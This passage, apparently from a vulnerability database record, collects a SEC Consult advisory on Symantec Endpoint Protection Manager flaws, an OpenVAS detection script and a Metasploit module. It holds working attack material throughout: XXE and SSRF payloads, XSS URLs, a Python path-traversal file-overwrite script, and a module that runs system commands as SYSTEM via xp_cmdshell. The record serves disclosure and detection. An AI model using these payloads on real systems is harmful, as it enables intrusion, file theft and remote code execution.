update to the latest version (12.1.5 RU 5) is highly recommended. \n \n \n \nVulnerability overview/description: \n----------------------------------- \n1) XML External Entity Injection (XXE) [CVE-2014-3437] \nMultiple XXE vulnerabilities were found in the Endpoint Protection Manager \napplication. An attacker needs to perform MitM attacks to impersonate \nsecurityresponse.symantec.com (eg. via DNS poisoning/spoofing/hijacking, \nARP spoofing, QUANTUM-style attacks, ...) to inject malicious XML code. \nThese vulnerabilities can be used to execute server side request \nforgery (SSRF) attacks used for portscanning/fingerprinting, denial of service, \nfile disclosure as well as attacks against functionality that is only \nexposed internally (see CVE-2013-5015 and issue #3). \n \nNote: \nThe exploitation scenario proves that the previous command execution via \nSQL injection was exploitable for an external attacker with the ability to \nmanipulate internet traffic _without any prior knowledge_ of the target system. \n \n \n2) Reflected Cross-Site-Scripting (XSS) [CVE-2014-3438] \nEndpoint Protection Manager suffers from a reflected cross-site scripting \nvulnerability, which allows an attacker to steal other users' sessions, to \nimpersonate other users and to gain unauthorized access to the admin interface. \n \n \n3) Unauthenticated Arbitrary File Write/Overwrite [CVE-2014-3439] \nArbitrary files can be written or overwritten by an unauthenticated attacker. \nThe target file is truncated in the process which results in Denial of Service. \nHowever it might be possible to write files with arbitrary content nonetheless. \n \n \n \nProof of concept: \n----------------- \n1) XML External Entity Injection (XXE) [CVE-2014-3437] \nThe Symantec Protection Center component downloads XML files from \nhttp://securityresponse.symantec.com for information purposes. \nBy impersonating securityresponse.symantec.com (eg. via DNS \npoisoning/spoofing/hijacking, ARP spoofing, QUANTUM-style attacks, ...) an \nattacker can inject malicious XML code into the file contents and thus exploit \nXXE vulnerabilities. \n \nFor example by offering the following XML code at the URL \nhttp://securityresponse.symantec.com/avcenter/deepsightkiosk/9.xml \narbitrary files can be disclosed via the Symantec Protection Center login \npage at https://<HOST>:8443/portal/Login.jsp \n \n=============================================================================== \n<?xml version=\"1.0\" encoding=\"UTF-8\"?> \n \n<!DOCTYPE a [<!ENTITY e SYSTEM 'file:///c:/windows/win.ini'> ]> \n \n<data> \n<regular> \n<text>&e;</text> \n</regular> \n<outbreak></outbreak> \n<threatcon>1</threatcon> \n</data> \n=============================================================================== \n \n \nServer Side Request Forgery (SSRF) can be exploited like in the following \nexample that sets the application log level to \"log all messages\" eg. via \nhttp://securityresponse.symantec.com/avcenter/deepsightkiosk/10.xml \n \n=============================================================================== \n<?xml version=\"1.0\" encoding=\"UTF-8\"?> \n \n<!DOCTYPE a [<!ENTITY e SYSTEM \n'http://localhost:9090/servlet/ConsoleServlet?ActionType=ConfigServer&logLevel=ALL'> ]> \n<foo>&e;</foo> \n=============================================================================== \n \nFurthermore some files can be exfiltrated to remote servers via the \ntechniques described in: \nhttps://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-wp.pdf \nhttp://vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf \n \n \n2) Reflected Cross-Site-Scripting (XSS) [CVE-2014-3438] \nAt least the following URLs are vulnerable to XSS: \nhttps://<HOST>:8443/console/Highlander_docs/SSO-Error.jsp?ErrorMsg=<script>alert('xss')</script> \nhttps://<HOST>:8443/portal/Loading.jsp?uri=Ij48c2NyaXB0PmFsZXJ0KCd4c3MnKTwvc2NyaXB0Pj9BQUFBPUJCQkIiPjxzY3JpcHQ%2bYWxlcnQoJ3hzcycpPC9zY3JpcHQ%2b \n \n \n3) Unauthenticated Arbitrary File Write/Overwrite [CVE-2014-3439] \nA flaw in ConsoleServlet allows an attacker to specify the application server \nthread name via the ActionType parameter. As the thread name is used in \nthe pattern that is passed to the java.util.logging.FileHandler constructor \nby the logging component (ServerLogger) an attacker can define the log file \npath. By causing an exception in the thread, the log file is written to \ndisk. \nThe following code snippet causes an exception by terminating the TCP \nconnection before the server has finished writing the response to the socket. \n \nActionType=/../../../../../../../../../../WINDOWS/win.ini%00 causes the win.ini \nfile to be truncated. \n \n=============================================================================== \nimport socket \nimport struct \n \nHOST = '<HOST>' \nPORT = 9090 \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ns.connect((HOST, PORT)) \nl_onoff = 1 \nl_linger = 0 \ns.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER,struct.pack('ii', l_onoff, l_linger)) \n \nmsg = '''GET \n/servlet/ConsoleServlet?ActionType=/../../../../../../../../../../WINDOWS/win.ini%00 \nHTTP/1.1 \nHost: SYMEPP \nEvilContent: <?php evilcode(); ?> \n \n''' \n \ns.sendall(msg) \ns.shutdown(socket.SHUT_RD) \n=============================================================================== \n \n \nActionType=/../../Inetpub/Reporting/evil.php%00 causes the (empty) file \nevil.php to be written into the Apache webroot. \n \nActionType=/../../Inetpub/Reporting/evil.php causes the file \nevil-0.log to be written into the Apache webroot. \n \nIf the application log level has been set to \"DEBUG\" (which can be achieved \nvia XXE, see issue #1) the file content includes all headers passed in the \nHTTP request (including the EvilContent header in the example above). However \nthe file will not be processed by PHP because of the .log extension. Due to \nthe complex nature of the Windows filesystem addressing modes (legacy/DOS, \nADS, etc.) it is entirely possible that this limitation can be bypassed. \n \n \n \nVulnerable / tested versions: \n----------------------------- \nThe vulnerabilities have been verified to exist in Symantec Endpoint Protection \nversion 12.1.4023.4080, which was the most recent version at the time of discovery. \n \n \nVendor contact timeline: \n------------------------ \n2014-07-11: Initial contact to secure@symantec.com \n2014-07-29: Ask for status at secure@symantec.com \n2014-08-01: Conference call about status, extended grace period to 2014-10-31 \nSeptember/October: Several discussions / rechecks of the vulnerabilities \n2014-11-06: Coordinated release of the advisory \n \n \nSolution: \n--------- \n \n1) XML External Entity Injection (XXE) [CVE-2014-3437] \n \nUpdate to version 12.1.5 RU 5 \n \n2) Reflected Cross-Site-Scripting (XSS) [CVE-2014-3438] \n \nUpdate to version 12.1.5 RU 5 \n \n3) Unauthenticated Arbitrary File Write/Overwrite [CVE-2014-3439] \n \nThe update to version 12.1.5 RU 5 only partially mitigates the vulnerability. \nPath Traversal is no longer possible, which reduces the severity to \nlow/medium. The vendor claims that it will be entirely solved in the next \nversion (12.1.5 RU6). \n \n \nFor further information see the security advisory of the vendor: \nhttp://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20141105_00 \n \n \nWorkaround: \n----------- \nSee Symantec security advisory for further mitigations. \n \n \nAdvisory URL: \n-------------- \nhttps://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm \n \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \nSEC Consult Vulnerability Lab \n \nSEC Consult \nVienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius - Zurich \n \nHeadquarter: \nMooslackengasse 17, 1190 Vienna, Austria \nPhone: +43 1 8903043 0 \nFax: +43 1 8903043 15 \n \nMail: research at sec-consult dot com \nWeb: https://www.sec-consult.com \nBlog: http://blog.sec-consult.com \nTwitter: https://twitter.com/sec_consult \n \nInterested in working with the experts of SEC Consult? \nWrite to career@sec-consult.com \n \nEOF Stefan Viehb\u00f6ck / @2014 \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/129000/SA-20141106-0.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2019-07-17T14:28:07", "bulletinFamily": "scanner", "description": "The host is installed with Symantec Endpoint Protection Manager and is prone\n to XXE and SQL injection vulnerabilities.", "modified": "2019-07-05T00:00:00", "published": "2014-03-20T00:00:00", "id": "OPENVAS:1361412562310804513", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804513", "title": "Symantec Endpoint Protection Manager XXE and SQL Injection Vulnerabilities", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Symantec Endpoint Protection Manager XXE and SQL Injection Vulnerabilities\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804513\");\n script_version(\"2019-07-05T10:41:31+0000\");\n script_cve_id(\"CVE-2013-5014\", \"CVE-2013-5015\");\n script_bugtraq_id(65466, 65467);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 10:41:31 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2014-03-20 11:33:41 +0530 (Thu, 20 Mar 2014)\");\n script_name(\"Symantec Endpoint Protection Manager XXE and SQL Injection Vulnerabilities\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Symantec Endpoint Protection Manager and is prone\n to XXE and SQL injection vulnerabilities.\");\n script_tag(name:\"vuldetect\", value:\"Send a specially crafted XML data including external entity references to\n TCP port 9090 and check whether it is able to execute commands remotely or not.\");\n script_tag(name:\"insight\", value:\"Flaw is due to an error when handling XML data within the servlet/ConsoleServlet.\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to disclose potentially sensitive\n information, manipulate certain data, and cause a DoS (Denial of Service).\");\n script_tag(name:\"affected\", value:\"Symantec Endpoint Protection Manager (SEPM) 11.0 before 11.0.7405.1424 and\n 12.1 before 12.1.4023.4080, and Symantec Protection Center Small Business\n Edition 12.x before 12.1.4023.4080\");\n script_tag(name:\"solution\", value:\"Upgrade Symantec Endpoint Protection Manager to version 11.0.7405.1424 or\n 12.1.4023.4080 or later, and Symantec Protection Center Small Business Edition\n to version 12.1.4023.4080 or later.\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/56798\");\n script_xref(name:\"URL\", value:\"http://seclists.org/bugtraq/2014/Feb/82\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/31853\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/31917\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/125282\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/125366\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\", \"http_version.nasl\");\n script_require_ports(\"Services/www\", 9090);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nhttp_port = get_http_port(default:9090);\n\nhost = http_host_name(port:http_port);\n\nif(http_vuln_check(port:http_port, url:\"/\", check_header:TRUE, usecache:TRUE,\n pattern:\">Symantec Endpoint Protection Manager<\",\n extra_check: \"Symantec Corporation<\"))\n{\n\n sleep = make_list(3, 5);\n\n foreach i (sleep)\n {\n url = \"/servlet/ConsoleServlet?ActionType=ConsoleLog\";\n\n postdata = string('------=_Part_156_33010715.1234\\r\\n',\n 'Content-Type: text/xml\\r\\n',\n 'Content-Disposition: form-data; name=\"Content\"\\r\\n\\r\\n',\n '<?xml version=\"1.0\" encoding=\"UTF-8\"?>\\r\\n',\n '<!DOCTYPE sepm [<!ENTITY payload SYSTEM \"http://127.0.0.1:', http_port,\n '/servlet/ConsoleServlet?ActionType=ConfigServer&action=test_av&Sequence',\n 'Num=140320121&Parameter=a\\'; call xp_cmdshell(\\'ping -n ', i + 1,' 127.0.0.1\\');--\" >]>\\r\\n',\n '<request>\\r\\n',\n '<xxe>&payload;</xxe>\\r\\n',\n '</request>\\r\\n',\n '------=_Part_156_33010715.1234--');\n\n req = string('POST ', url, ' HTTP/1.1\\r\\n',\n 'Host: ', host, '\\r\\n',\n 'Accept-Encoding: identity\\r\\n',\n 'Content-Length: ', strlen(postdata), '\\r\\n',\n 'Content-Type: multipart/form-data; boundary=\"----=_Part_156_33010715.1234\"\\r\\n\\r\\n',\n postdata);\n start = unixtime();\n res = http_keepalive_send_recv(port:http_port, data:req);\n stop = unixtime();\n\n if(stop - start < i || stop - start > (i+5)) exit(0); # not vulnerable\n }\n security_message(port:http_port);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2019-10-14T21:48:23", "bulletinFamily": "exploit", "description": "This module exploits XXE and SQL injection flaws in Symantec Endpoint Protection Manager versions 11.0, 12.0 and 12.1. When supplying a specially crafted XML external entity (XXE) request an attacker can reach SQL injection affected components. As xp_cmdshell is enabled in the included database instance, it's possible to execute arbitrary system commands on the target with SYSTEM privileges.\n", "modified": "2017-07-24T13:26:21", "published": "2014-02-25T13:58:00", "id": "MSF:EXPLOIT/WINDOWS/ANTIVIRUS/SYMANTEC_ENDPOINT_MANAGER_RCE", "href": "", "type": "metasploit", "title": "Symantec Endpoint Protection Manager /servlet/ConsoleServlet Remote Command Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/exploit/powershell'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include REXML\n include Msf::Exploit::CmdStager\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Symantec Endpoint Protection Manager /servlet/ConsoleServlet Remote Command Execution',\n 'Description' => %q{\n This module exploits XXE and SQL injection flaws in Symantec Endpoint Protection Manager\n versions 11.0, 12.0 and 12.1. When supplying a specially crafted XML external entity (XXE) request an attacker\n can reach SQL injection affected components. As xp_cmdshell is enabled in the included\n database instance, it's possible to execute arbitrary system commands on the target\n with SYSTEM privileges.\n },\n 'Author' =>\n [\n 'Stefan Viehbock', # Discovery\n 'Chris Graham', # PoC exploit\n 'xistence <xistence[at]0x90.nl>' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2013-5014'],\n ['CVE', '2013-5015'],\n ['OSVDB', '103305'],\n ['OSVDB', '103306'],\n ['EDB', '31853'],\n ['URL', 'https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20140218-0_Symantec_Endpoint_Protection_Multiple_critical_vulnerabilities_wo_poc_v10.txt']\n ],\n 'Arch' => ARCH_X86,\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows VBS Stager', {}]\n ],\n 'Privileged' => true,\n 'DisclosureDate' => 'Feb 24 2014',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n Opt::RPORT(9090),\n OptString.new('TARGETURI', [true, 'The base path', '/'])\n ])\n deregister_options('CMDSTAGER::FLAVOR')\n end\n\n def check\n res = send_request_cgi(\n {\n 'uri' => normalize_uri(target_uri.path),\n 'method' => 'GET',\n })\n\n if res && res.code == 200 && res.body =~ /Symantec Endpoint Protection Manager/ && res.body =~ /1995 - 2013 Symantec Corporation/\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n def exploit\n print_status(\"Sending payload\")\n # Execute the cmdstager, max length of the commands is ~3950\n execute_cmdstager({:flavor => :vbs, :linemax => 3950})\n end\n\n def execute_command(cmd, opts = {})\n # Convert the command data to hex, so we can use that in the xp_cmdshell. Else characters like '>' will be harder to bypass in the XML.\n command = \"0x#{Rex::Text.to_hex(\"cmd /c #{cmd}\", '')}\"\n\n # Generate random 'xx032xxxx' sequence number.\n seqnum = \"#{rand_text_numeric(2)}032#{rand_text_numeric(4)}\"\n\n soap = soap_request(seqnum, command)\n\n post_data = Rex::MIME::Message.new\n post_data.add_part(soap, \"text/xml\", nil, \"form-data; name=\\\"Content\\\"\")\n xxe = post_data.to_s\n\n res = send_request_cgi(\n {\n 'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),\n 'method' => 'POST',\n 'vars_get' => { 'ActionType' => 'ConsoleLog' },\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\n 'data' => xxe,\n })\n\n if res and res.body !~ /ResponseCode/\n fail_with(Failure::Unknown, \"#{peer} - Something went wrong.\")\n end\n end\n\n def soap_request(seqnum, command)\n randpayload = rand_text_alpha(8+rand(8))\n randxxe = rand_text_alpha(8+rand(8))\n entity = \"<!ENTITY #{randpayload} SYSTEM \\\"http://127.0.0.1:9090/servlet/ConsoleServlet?\"\n entity << \"ActionType=ConfigServer&action=test_av&SequenceNum=#{seqnum}&Parameter=';call xp_cmdshell(#{command});--\\\" >\"\n\n xml = Document.new\n xml.add(DocType.new('sepm', \"[ METASPLOIT ]\"))\n xml.add_element(\"Request\")\n xxe = xml.root.add_element(randxxe)\n xxe.text = \"PAYLOAD\"\n\n xml_s = xml.to_s\n xml_s.gsub!(/METASPLOIT/, entity) # To avoid html encoding\n xml_s.gsub!(/PAYLOAD/, \"&#{randpayload};\") # To avoid html encoding\n\n xml_s\n end\nend\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/antivirus/symantec_endpoint_manager_rce.rb"}]}
